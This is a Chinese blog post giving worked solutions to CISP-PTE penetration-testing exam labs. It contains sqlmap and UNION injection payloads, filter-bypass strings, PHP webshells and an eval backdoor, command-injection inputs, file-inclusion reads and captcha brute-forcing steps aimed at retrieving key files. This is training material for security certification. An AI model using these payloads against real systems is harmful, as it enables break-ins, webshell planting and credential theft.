美文网首页
CISP-PTE历年真题解析

CISP-PTE历年真题解析

作者: migrate_ | 来源:发表于2020-08-06 14:44 被阅读0次

    第一题:基础题目之SQL注入

    a.jpg b.jpg
    • 解题思路一
    1. 先随便注册一个账号,用这个账号登陆,在发表界面发布内容并抓包,把这个包保存到sql.txt里边,用sqlmap去注入
    sqlmap.py -r 1.txt --dbs
    sqlmap.py -r 1.txt --tables -D "test"
    sqlmap.py -r 1.txt --columns -T "admin" -D "test"
    sqlmap.py -r 1.txt --dump -C "user,pass" -T "admin" -D "test"
    或者
    --sql-query="select password from users1 where username='admin'"
    
    • 解题思路二
    1. 注册页面也存在sql注入漏洞(前提是得用sqlmap检测出表名和列名)
    admin' union select 1,username,password,4 from users1#
    
    c.jpg

    第二题:基础题目之文件上传突破

    d.jpg e.jpg
    • 解题思路一
    1. 此题经过简单的测试过滤了eval,post,php文件后缀等
    copy 1.jpg/a+2.php/b  #制作一句话图片马
    <?php system($_GET['cmd']); ?>
    上传抓包,修改文件后缀为phtml,pHp等
    
    • 解题思路二
    可以用大小写绕过过滤的字符
    Eval
    
    1. 上传成功一句话之后,执行命令获取根目录下的key.php

    第三题:基础题目之文件包含

    f.jpg g.jpg
    • 解题思路一
    1. 由url可知包含的是view.html,通过浏览器直接访问该文件查看源码可知
    <?php 
    @$a = $_POST['Hello']; 
    if(isset($a)){ 
    @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); 
    } 
    ?>
    Hello
    
    1. 此页面是包含一句话后门的文件,可直接通过菜刀连接
    #得用Cknife.jar版本的菜刀
    修改config.ini文件为:
    ACTION=z0
    PHP_MAKE=
    #连接
    http://xxx.com/vulnerabilities/fu1.php?file=view.html
    #密码
    Hello=0
    
    • 解题思路二
    1. 在得知此文件存在后门的情况下直接通过命令读取key.php
    http://xxx.com/vulnerabilities/fu1.php?file=view.html
    Hello=a&z0=echo passthru("cat ../key.php");
    Hello=a&z0=ZWNobyBwYXNzdGhydSgiY2F0IC4uL2tleS5waHAiKTs=
    

    第四题:基础题目之命令执行

    k.jpg l.jpg
    • 解题思路一
    127.0.0.1|pwd
    #查看当前目录
    127.0.0.1|ls ../
    #找到key.php
    127.0.0.1 &c'a't ../key.'p'hp
    #获取到key
    
    • 解题思路二
    127.0.0.1|diff /var/www/html/key.php  index.php
    
    • 解题思路三
    127.0.0.1;curl file:///var/www/html/key.php
    
    • 解题思路四
    127.1.1.1 && echo "<?php echo file_get_contents('../key.php');?>" > shell4key.php
    
    • php显示文件内容的语句
    <?php echo highlight_file('../key.php')?>
    <?php echo file_get_contents("../cfg_database.php");?>
    

    第五题:基础题目之验证码爆破

    m.jpg n.jpg
    • 解题思路一
    验证码可以被重复利用
    直接burpsuit抓包就暴力破解
    

    第六题:二阶SQL注入

    o.jpg p.jpg
    • 解题思路一
    注册一个用户
    admin' #
    密码为
    123
    用这个账户登录然后重置密码为
    123456
    退出登录然后用
    admin
    123456
    重新登陆
    
    • 解题思路二
    直接抓包用sqlmap去注入即可
    

    第七题:基础题目-日志分析

    q.jpg
    • 解题思路一
    文件下载是一些目录扫描的链接
    首先筛选状态码为200的链接
    然后以door为关键词筛选
    发现可以文件
    /admin/backdoor.php
    访问即可得到key
    

    第八题:基础题目-代码审计

    r.jpg s.jpg
    • 解题思路一
      通过代码可以看出,文件本身是可以执行命令的但是又限制了命令的长度(30个字符)
    echo '<?php'>w.php
    echo 'system($_GET[1])'>>w.php
    echo ';?>'>>w.php
    
    • 解题思路二
    echo '<?php'>q.php
    echo 'eval($_POST[1])'>>q.php
    echo ';?>'>>q.php
    
    • 解题思路三
    ls | grep key >123.html
    

    第九题:基础题目之SQL注入

    t.jpg u.jpg
    • 解题思路一
    通过简单的测试发现过滤了空格,union,#等字符
    
    #绕过
    id=1')/**/order/**/by/**/4%23
    id=-1')/**/uniounionn/**/select/**/1,2,3,4%23
    id=-1')/**/uniounionn/**/select/**/1,2,load_file('/tmp/360/key'),4%23
    

    第十题:基础题目之文件包含

    v.jpg w.jpg
    • 解题思路一
    1. 这道题与上边的文件包含题不同,源码里并没有发现后门的存在.
    php://filter/read=convert.base64-encode/resource=file:///var/www/html/key.php
    

    第十一题:基础题目之日志分析

    y.jpg
    • 解题思路
    通过ip地址筛选出一部分
    再通过状态码200筛选,找到可以文件
    adminlogin.php
    打开发现是个登录页面
    进行爆破
    admin  password123
    

    相关文章

      网友评论

          本文标题:CISP-PTE历年真题解析

          本文链接:https://www.haomeiwen.com/subject/hbqgohtx.html